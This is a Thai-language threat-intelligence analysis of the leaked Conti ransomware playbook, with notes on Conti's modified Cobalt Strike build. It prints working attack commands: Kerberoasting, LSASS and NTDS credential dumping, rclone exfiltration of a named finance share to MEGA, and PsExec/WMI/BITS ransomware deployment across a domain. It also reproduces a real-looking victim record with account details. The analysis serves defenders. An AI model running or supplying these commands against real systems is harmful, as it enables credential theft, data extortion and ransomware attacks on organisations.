execute-assembly /home/user/work/Rubeus.exe kerberoast /ldapfilter: 'admincount = 1' / format:hashcat /outfile:C:\ProgramData\hashes.txt
execute-assembly /home/user/work/Rubeus.exe asreproast /format:hashcat /outfile:C:\ProgramData\asrephashes.txt
 • ใช้ mimikatz โดยใช้ฟังก์ชัน sekurlsa::logonpasswords และ lsadump::sam รวมไปถึง lsadump::dcsync เพื่อใช้เทคนิค DCSync
 • ใช้เทคนิค DCSync ผ่านฟีเจอร์ของ Cobalt Strike
 • สร้างไฟล์ minidump ของโปรเซส lsass.exe ด้วยโปรแกรม Task Manager เพื่อนำค้นหาข้อมูลสำหรับยืนยันตัวตนด้วย mimikatz ที่ระบบภายนอกต่อ
 • ใช้ ProcDump ในการสร้างไฟล์ memory dump ของโปรเซส lsass.exe
 • เรียกใช้ฟังก์ชัน MiniDump ในไลบรารี comsvcs.dll เพื่อสร้างไฟล์ memory dump ของโปรเซส lsass.exe
 • ใช้สคริปต์ Net-GPPPassword ในการหารหัสผ่านที่อาจมีอยู่ในไฟล์ Group Policy (สามารถเรียกใช้ได้ผ่าน execute-assembly)
 • ใช้โปรแกรม RouterScan เพื่อ brute force ทางเครือข่าย
 • ใช้ Invoke-SMBAutoBrute.ps1 เพื่อ brute force ระบบเป้าหมายผ่านโปรโตคอล SMB
// Method 1: via rundll32
shell rundll32.exe C:\Windows\System32\comsvcs.dll,MiniDump <PID> C:\ProgramData\lsass.dmp full

// Method 2: via wmic
shell wmic /node:<target> process call create "cmd /c rundll32.exe C:\Windows\System32\comsvcs.dll,MiniDump <PID> C:\ProgramData\lsass.dmp full"

// Method 3: via PsExec
remote-exec psexec <target> cmd /c rundll32.exe C:\Windows\System32\comsvcs.dll,MiniDump <PID> C:\ProgramData\lsass.dmp full
 • โจมตีช่องโหว่ในระบบที่ทำให้โดยมาซึ่งข้อมูลสำหรับใช้ยืนยันตัวตนหรือเงื่อนไข remote code execution ที่สามารถใช้เก็บข้อมูลสำหรับใช้ยืนยันตัวตนได้ต่อ ช่องโหว่ที่ถูกระบุมีดังนี้
  • ZeroLogon (CVE-2020-1472): มีตัวอย่างคำสั่งในการใช้ฟังก์ชัน lsadump::zerologon ใน mimikatz และ ZeroLogon-BOF ผ่าน Cobalt Strike ในการโจมตี
  • PrintNightmare (CVE-2021-34527): ใช้ powershell-import เพื่อเรียกฟังก์ชัน Invoke-Nightmare ในการโจมตี
  • MS17-010: ใช้ Metasploit Framework เพื่อโจมตีระบบที่มีช่องโหว่จากนั้นฝังตัวและเก็บข้อมูลสำหรับใช้ยืนยันตัวตนในระบบที่โจมตีได้
 • ทำสำเนาไฟล์ NTDS ออกมา จุดน่าสนใจในส่วนนี้คือเทคนิคที่ใช้ในการสร้างสำเนาไฟล์ คู่มือของ Conti ระบุให้ใช้ฟีเจอร์ Volume Shadow Copies ในการสร้างสำเนาจากนั้นทำการคัดลอกสำเนาจากพาธของ Volume Shadow Copies ออกมา เทคนิคนี้เป็นเทคนิคเดียวกันกับช่องโหว่ HiveNightmare หรือ SeriousSAM ซึ่งพึ่งถูกเปิดเผยเมื่อต้นเดือนสิงหาคม 2021
// Step 1: Create a shadow copy
shell wmic /node:"DC01" /user:"DOMAIN\admin" /password:"cleartextpass" process call create "cmd /c vssadmin create shadow /for=C:\ 2>&1"

// Step 2: Copy the shadow copy out
shell wmic /node:"DC01" /user:"DOMAIN\admin" /password:"cleartextpass" process call create "cmd / c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy55\Windows\NTDS\NTDS.dit c:\temp\log\ & copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy55\Windows\System32\config\SYSTEM c:\temp\log\ & copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy55\Windows\System32\config\SECURITY c:\temp\log\

// Step 3: Compress for exfiltrating
7za.exe a -tzip -mx5 \\DC01\C$\temp\log.zip \\DC01\C$\temp\log -pTOPSECRETPASSWORD
 • ค้นหาข้อมูลสำรองและข้อมูลใน NAS โดยใช้โปรแกรม NetScan ที่มีอยู่ในชุดข้อมูล ManualsAndSoftware

จากนั้นผู้ปฏิบัติการจะทำการสร้างช่องทางลับในการเข้าถึงระบบภายหลัง ผู้ปฏิบัติการจะอาศัยซอฟต์แวร์ในกลุ่ม remote monitoring and management หรือ RMM อย่าง AnyDesk หรือ Atera ซึ่งมักปรากฎอยู่ในองค์กรโดยทั่วไปอยู่แล้วในการจัดการการเข้าถึง สคริปต์สำหรับดาวโหลดและติดตั้ง AnyDesk ที่พบในชุดข้อมูล ManualsAndSoftware จะถูกใช้ในส่วนนี้

ในส่วนสุดท้ายของขั้นตอนที่ 1 คู่มือจะเน้นไปที่แนวทางของการระบุหาบัญชีของผู้ดูแลระบบทั้งในสภาพแวดล้อมที่เป็น Active Directory, เซิร์ฟเวอร์, NAS, ระบบสำรองข้อมูลใส่เทปรวมไปถึงระบบคลาวด์ซึ่งมักมีข้อมูลสำรองอยู่ แนวทางในส่วนการระบุหาบัญชีของผู้ดูแลระบบเกิดขึ้นทั้งการโดยใช้คำสั่ง net , โปรแกรม SharpView และใช้โปรแกรม AdFind พร้อมกับสคริปต์เพื่อช่วยเก็บข้อมูล

ข้อมูลในส่วนนี้มีค่อนข้างมากเนื่องจากคู่มือให้รายละเอียดในการทำความเข้าใจผลลัพธ์จากคำสั่งและโปรแกรมควบคู่ไปกับการทำความเข้าใจโครงสร้างขององค์กรเป้าหมาย รวมไปถึงการข้อมูลในเว็บเบราว์เซอร์, ไฟล์ประวัติการใช้งานโปรแกรมต่าง ๆ เช่น Putty, WinSCP, DBeaver และอื่น ๆ, ไฟล์ที่เกี่ยวข้องกับโปรแกรมในกลุ่ม password manager หรือไฟล์ที่อาจมีรหัสผ่านบันทึกอยู่ภายใน

4.1.2 Uploading Data

เมื่อเป้าหมายในขั้นตอนแรกเสร็จสิ้น ผู้ปฏิบัติการสามารถเข้าถึงบัญชีที่มีสิทธิ์สูงสุดในระบบขององค์กรเป้าหมายรวมไปถึงมีข้อมูลเกี่ยวกับแหล่งข้อมูลหลักและแหล่งข้อมูลสำรองขององค์กร ขั้นตอนต่อไปที่ผู้ปฏิบัติการจะดำเนินการคือการนำข้อมูลดังกล่าวออกไปยังระบบภายนอกเพื่อสร้างเงื่อนไขแรกในการเรียกค่าไถ่ ขั้นตอนของการส่งออกข้อมูลประกอบไปด้วยขั้นตอนย่อยดังต่อไปนี้

 1. เปิดบัญชีบริการ MEGA โดยเลือกแพ็คเกจการใช้งานเป็น Pro I ที่จะได้รับพื้นที่ในการเก็บข้อมูลทั้งหมด 2 เทระไบต์ ให้นำข้อมูลการจ่ายเงินจากหัวหน้าทีมไประบุและเก็บใบเสร็จการชำระค่าบริการเพื่อส่งคืนให้กับหัวหน้าทีม คู่มือยังกำชับไม่ให้มีการใช้บัญชี MEGA เดียวกันในหลายเป้าหมายหรือข้ามทีมด้วย
 2. สร้างไฟล์การตั้งค่าสำหรับโปรแกรม rclone เพื่อให้สามารถอัปโหลดข้อมูลไปยังบริการ MEGA ได้
 3. เริ่มทำการอัปโหลดโดยใช้โปรแกรม rclone ตัวอย่างคำสั่งที่ใช้ในการอัปโหลดตามตัวอย่างด้านล่าง (มีการแนะนำให้อ่านคู่มือของ rclone เพื่อเรียนรู้พารามิเตอร์อื่น ๆ ที่อาจใช้เพื่อประสิทธิภาพในการอัปโหลดไฟล์)
shell rclone.exe copy "\\WTFINANCE.washoetribe.net\E$\FINANCE" mega:1 -q --ignore-existing --auto-confirm --multi-thread-streams 1 --transfers 3 --bwlimit 5M
 1. ในกรณีของการนำไฟล์ออกจากเซิร์ฟเวอร์แบบแยกเดี่ยว คู่มือมีการแนะนำให้ติดตั้งโปรแกรม MEGA Sync ของบริการ MEGA เพื่อทำการอัปโหลดข้อมูลเช่นเดียวกัน
 2. สร้างชุดข้อมูลสำหรับการข่มขู่โดยเน้นไปที่การหาข้อมูลบัญชีหรือประวัติการทำธุรกรรมย้อนหลัง เน้นไปที่ข้อมูลที่มีคีย์เวิร์ด อาทิ cyber, policy, insurance, endorsement, supplementary, underwriting, terms, bank, 2020, 2021 และ Statement จากนั้นทำสำเนาข้อมูลเหล่านี้พร้อมรายการแยกออกมาจากข้อมูลที่มีอยู่ใน MEGA

4.1.3 Deploying Locker

ในส่วนสุดท้ายที่ปรากฎในชุดข้อมูล ผู้ปฏิบัติการจะได้รับคำสั่งให้เตรียมพร้อมเพื่อการติดตั้งและเริ่มการทำงานมัลแวร์เรียกค่าไถ่ ขั้นตอนในส่วนนี้จะเริ่มต้นโดยการใช้ระบบซึ่งทำหน้าที่เป็น domain controller เป็นจุดในการกระจายไฟล์โปรแกรมของมัลแวร์เรียกค่าไถ่ไปยังระบบที่อยู่ในโดเมนเดียวกัน ช่องทางของการแพร่กระจายไฟล์โปรแกรมนั้นเกิดขึ้นผ่านโปรโตคอล SMB และการใช้ฟีเจอร์ Background Intelligent Transfer Service (BITS) เข้ามาช่วย คู่มือระบุให้ทำการสร้างไฟล์สคริปต์เพื่อดำเนินการในขั้นตอนนี้โดยให้แยกตามลักษณะของโปรโตคอลหรือฟังก์ชันที่ใช้ ตามตัวอย่างด้านล่าง

// Copying ransomware payload across the entire domain
start PsExec.exe /accepteula @C:\share$\comps1.txt -u DOMAIN\ADMINISTRATOR -p PASSWORD cmd /c COPY "\\PRIMARY_DOMAIN_CONTROLLER\share$\fx166.exe" "C:\windows\temp\ "

// Executing ransomware payload across the entire domain
start PsExec.exe -d @C:\share$\comps1.txt -u DOMAIN\ADMINISTRATOR -p PASSWORD cmd /c c:\windows\temp\fx166.exe

// Copying and executing with WMI and Bitsadmin
start wmic /node:@C:\share$\comps1.txt /user:"DOMAIN \Administrator" /password:"PASSWORD" process call create "cmd.exe /c bitsadmin /transfer fx166 \\DOMAIN_CONTROLLER\share$\fx166.exe %APPDATA%\fx166.exe & %APPDATA%\fx166.exe "

นอกเหนือจากการกระจายและเอ็กซีคิวต์โปรแกรมของมัลแวร์เรียกค่าไถ่ คู่มือยังระบุถึงการปิดการทำงานของโปรแกรมป้องกันมัลแวร์ในระบบด้วย (น่าจะบอกก่อนที่จะปล่อย)

สุดท้ายเมื่อโปรแกรมของมัลแวร์เรียกค่าไถ่ทำงานเสร็จสิ้น ผู้ปฏิบัติการจะต้องจัดเตรียมรายการปฏิบัติการตามตัวอย่างด้านล่าง

Example:
===============================================================
https://www.zoominfo.com/c/labranche-therrien-daoust-lefrancois/414493394
Website: ltdl.ca
1398 Servers 9654 Works - all in lock
Mega :
[email protected]
u4 naY [ pclwuhkpo5iW
25000 GB info

Labranche Therrien Daoust Lefrançois - financiers / accountants
Revenue: $ 985 Million
Locker: Conti
Case from botnet
--- BEGIN ID ---
i0KrUPg8RSrFuPPr16C931X2rS04c4892ZR1fNVfhmrmVXtOlxYisSzBJHvksbzI
================================================================

4.2 Additional Analysis - Cobalt Strike

หนึ่งในประเด็นน่าสนใจจากการวิเคราะห์ชุดข้อมูลของ Conti อยู่ในประเด็นของเครื่องมือที่ใช้ แม้ว่าเครื่องมือที่ใช้ในการโจมตีโดยส่วนใหญ่จะเป็นโปรแกรมหรือโครงการแบบโอเพนซอร์ส แต่การควบคุมและสั่งการระบบเป้าหมายของ Conti ก็พึ่งพาโปรแกรม Cobalt Strike ซึ่งไม่ใช่โปรแกรมฟรีเป็นหลัก ผู้ปฏิบัติการที่เกี่ยวข้องกับ Conti ยังได้รับการแจกชุดโปรแกรมเถื่อนของโปรแกรม Cobalt Strike เพื่อให้สามารถเข้าถึงระบบและเริ่มปฏิบัติการได้

คำถามในสถานการณ์นี้เกิดขึ้นทั้งในมุมของผู้วิเคราะห์อย่างผมเกี่ยวกับรายละเอียดของการตั้งค่าสำหรับโปรแกรม Cobalt Strike ที่อาจมีความพิเศษมากกว่าปกติที่อาจนำไปมาสู่การระบุหาเซิร์ฟเวอร์ที่ใช้ออกคำสั่งและควบคุมได้ รวมไปถึงประเด็นของการใช้งานปลั๊กอินหรือส่วนเสริมของโปรแกรม Cobalt Strike ในการช่วยสนับสนุนปฏิบัติการ ในอีกมุมหนึ่งจะเกิดขึ้นหากเราจำลองตัวเองเป็นผู้ปฏิบัติการเสียเองด้วยคำถามง่าย ๆ ว่าเป็นไปได้ไหมที่โปรแกรม Cobalt Strike จะถูกแก้ไขด้วยบางวิธีการให้เป็นประโยชน์ต่อกลุ่ม Conti ในภายหลังด้วย

การวิเคราะห์ในส่วนนี้จึงเกิดขึ้นเพื่อพยายามทำความเข้าใจและหาคำตอบในความเป็นไปได้เหล่านี้ครับ

Conti พึ่งพาการเอ็กซีคิวต์คำสั่งส่วนใหญ่ผ่านทาง Cobalt Strike พฤติกรรมนี้สอดคล้องไปกับข้อมูลที่พบในชุดคู่มือที่ถูกปล่อยออกมา โดยในชุดข้อมูลที่ปล่อยออกมานั้นมีชุดโปรแกรม Cobalt Strike รุ่น 4.3 อยู่ด้วย

หากเปรียบเทียบกับสำเนาเถื่อนของ Cobalt Strike 4.3 ที่มีการเผยแพร่อยู่ในอินเตอร์เน็ตนั้น สำเนา Cobalt Strike 4.3 ของ Conti มีข้อแตกต่างอยู่บางส่วน ดังนี้

 • การมีอยู่ของไฟล์ BaseArtifactUtils.class และ ListenerConfig.class ซึ่งไม่มีในสำเนาเถื่อนแบบอื่น ไฟล์ BaseArtifactUtils.class เกี่ยวข้องการปรับแต่งและตั้งค่า payload ของ Cobalt Strike ส่วนไฟล์ ListenerConfig.class เกี่ยวกับการปรับแต่งการตั้งค่าของ listener
 • การมีอยู่ของไฟล์ cobaltstrike.store ซึ่งแสดงให้เห็นว่าเคยมีการสร้าง certificate สำหรับ TeamServer มาก่อนแล้ว keystore ใช้รหัสผ่าน sUp3r@dm1n ซึ่งเป็นรหัสผ่านเดียวกันกับสำเนาเถื่อนของ Cobalt Strike 4.3 และมีรายการของ private key อยู่เพียงรายการเดียว
Keystore type: PKCS12
Keystore provider: SUN

Your keystore contains 1 entry

cobaltstrike, Nov 13, 2020, PrivateKeyEntry, 
Certificate fingerprint (SHA-256): E4:AC:A4:BC:16:D4:67:36:41:AE:6D:44:10:1E:2E:AB:09:A3:7B:6C:6B:79:FD:50:22:AD:1D:93:A2:76:15:F0
 • การมีอยู่ของไฟล์ cs.jar ซึ่งถูกใช้เป็น client แทนไฟล์ cobaltstrike.jar ข้อแตกต่างในส่วนนี้ส่งผลต่อไฟล์ launcher สำหรับลินุกซ์cobaltstrike ในส่วนที่เป็นพารามิเตอร์ชื่อไฟล์ด้วย
 • ข้อแตกต่างในไฟล์ cobaltstrike.jar ซึ่งเป็นไฟล์ client หลักของ Cobalt Strike ไฟล์ cobaltstrike.jar ในชุดโปรแกรมของ Conti มีข้อแตกต่างอยู่ในซอร์สโค้ดบางส่วนใน BaseArtifactUtils.class และ ListenerConfig.class ยังไม่สามารถระบุข้อแตกต่างอย่างเฉพาะเจาะจงได้
 • พารามิเตอร์ที่แตกต่างกันในไฟล์ launcher อย่าง start.sh และ teamserver ข้อมูลที่แตกต่างกันส่วนใหญ่ไม่ได้มีความแตกต่างกันอย่างมีนัยยะสำคัญเมื่อเทียบกับการรั่วไหลของสำเนาเถื่อนของ Cobalt Strike 4.3 หลาย ๆ ครั้ง

แม้จะมีความแตกต่างกับสำเนาเถื่อนที่ปรากฎในอินเตอร์เน็ต ชุดโปรแกรม Cobalt Strike ของ Conti ก็ยังไม่มีข้อแตกต่างที่บ่งชี้ให้เห็นถึงการฝังโค้ดที่เป็นอันตรายลงไปจากการตรวจสอบเบื้องต้น

5. References